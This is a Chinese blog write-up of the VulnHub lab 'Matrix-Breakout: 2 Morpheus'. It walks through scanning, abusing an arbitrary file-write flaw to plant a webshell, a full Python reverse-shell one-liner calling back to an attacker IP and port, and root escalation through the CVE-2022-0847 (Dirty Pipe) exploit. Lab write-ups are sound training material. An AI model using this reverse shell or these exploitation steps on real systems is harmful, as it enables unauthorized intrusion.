首页 > 其他分享 >vulnhub靶场-->MATRIX-BREAKOUT: 2 MORPHEUS

vulnhub靶场-->MATRIX-BREAKOUT: 2 MORPHEUS

时间:2023-01-31 13:15:53浏览次数:63  
标签:发现 socket -- 扫描 MORPHEUS 漏洞 os 目录 MATRIX

靶机下载地址

MATRIX-BREAKOUT: 2 MORPHEUS < 点我下载

开始打靶

IP发现

nmap扫描网段发现靶机ip:192.168.111.139

端口发现

对靶机进行常规端口扫描

发现两个http端口

访问网站

一个页面毫无可以点

目录扫描

目录扫描发现存在 robots.txt文件

毫无意义。。。。。。换个工具继续扫,在kali的字典目录下发现了另一个目录扫描工具dirbuster,就用它扫吧,根据网上教程设置后开扫。

这里用这个工具自己的字典尝试一下,start 后就静候佳音......扫描过程中发现一个可以的php文件

访问一下

输入 1111 点击Post按钮,观察页面显示,并抓包

发现数据包中存在一个graffiti.txt文件,访问发现刚才1111的被写入到该文件中,疑似存在任意文件写入漏洞

写入webshell

修改数据包发送一句话木马尝试一下

回显正常,使用蚁剑进行连接

连接成功,反弹nc shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.111.128\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'

反弹成功

内核信息

发现是Debian 11,搜索相关漏洞进行提权

貌似没找到相关漏洞,上传linpeas.sh检测漏洞信息

提权

这里使用 CVE-2022-0847 进行提权,网上搜索相关exp:https://github.com/imfiver/CVE-2022-0847 并根据说明运行exp

第一个flag,在根目录下

第二个flag,在root目录下

完成!

知识点归纳

1、IP发现
2、端口扫描
3、目录扫描
4、黑盒测试
5、任意文件写入漏洞利用
6、木马连接
7、nc反弹shell
8、权限提升

 

标签:发现,socket,--,扫描,MORPHEUS,漏洞,os,目录,MATRIX
From: https://www.cnblogs.com/spmonkey/p/17077267.html

相关文章

  • Revit二次开发针对类库项目中WPF界面如何引用第三方控件库HandyControl的方法
    起因是当使用类库作为WPF界面的项目时,项目中没有App.xaml,也就导致没有办法在全局资源中统一设置HandyControl的资源。解决方案很简单安装完HandyControl库后,在Window中加......
  • vulnhub靶场 --> JANGOW: 1.0.1
    靶机下载地址JANGOW:1.0.1 <点我下载开始打靶IP发现nmap扫描网段发现靶机ip:192.168.111.140端口发现对靶机进行常规端口扫描访问网站访问80端口发现是个目录......
  • 运维实践 | OpenMLDB 跨机房容灾方案
    背景在单集群部署环境下,OpenMLDB具备集群内节点级别的高可用能力。但若受到机房断电或者自然灾害等不可抗拒因素,则将造成的机房或大部分节点无法正常运转的情况,从而引发......
  • [LeetCode] 1626. Best Team With No Conflicts
    Youarethemanagerofabasketballteam.Fortheupcomingtournament,youwanttochoosetheteamwiththehighestoverallscore.Thescoreoftheteamisthe......
  • 扒一扒Bean注入到Spring的那些姿势,你会几种?
    大家好,我是三友~~这篇文章我准备来扒一扒Bean注入到Spring的那些姿势。其实关于Bean注入Spring容器的方式网上也有很多相关文章,但是很多文章可能会存在以下常见的问题......
  • 垃圾收集器必问系列—G1
    本文已收录至Github,推荐阅读......
  • 基于Spring Cache实现Caffeine、jimDB多级缓存实战
    作者:京东零售王震背景在早期参与涅槃氛围标签中台项目中,前台要求接口性能999要求50ms以下,通过设计Caffeine、ehcache堆外缓存、jimDB三级缓存,利用内存、堆外、jimDB缓存不......
  • Linux——MySQL主从复制读写分离
     主从复制用来保证数据的一致性和完整性 主从复制原理:主MySQL需要开启二进制日志保存用户对Mysql数据的操作。   从数据库监听主MySQL日志变化,发现更新复制日志......
  • C代码模拟IOC
    C代码模拟IOC用途一个模块记录设备诸多状态,当任意一个状态发生变化时,会执行对应的回调操作实现思想将设备状态进行备份,如果设备最新状态变化,可以比较出哪个状态发生变......
  • lowbit
    求1最低位置(不打表)#include<iostream>#include<cmath>usingnamespacestd;intlowbit(intn){returnn&-n;}intposof(intn){returnlog10(n)/......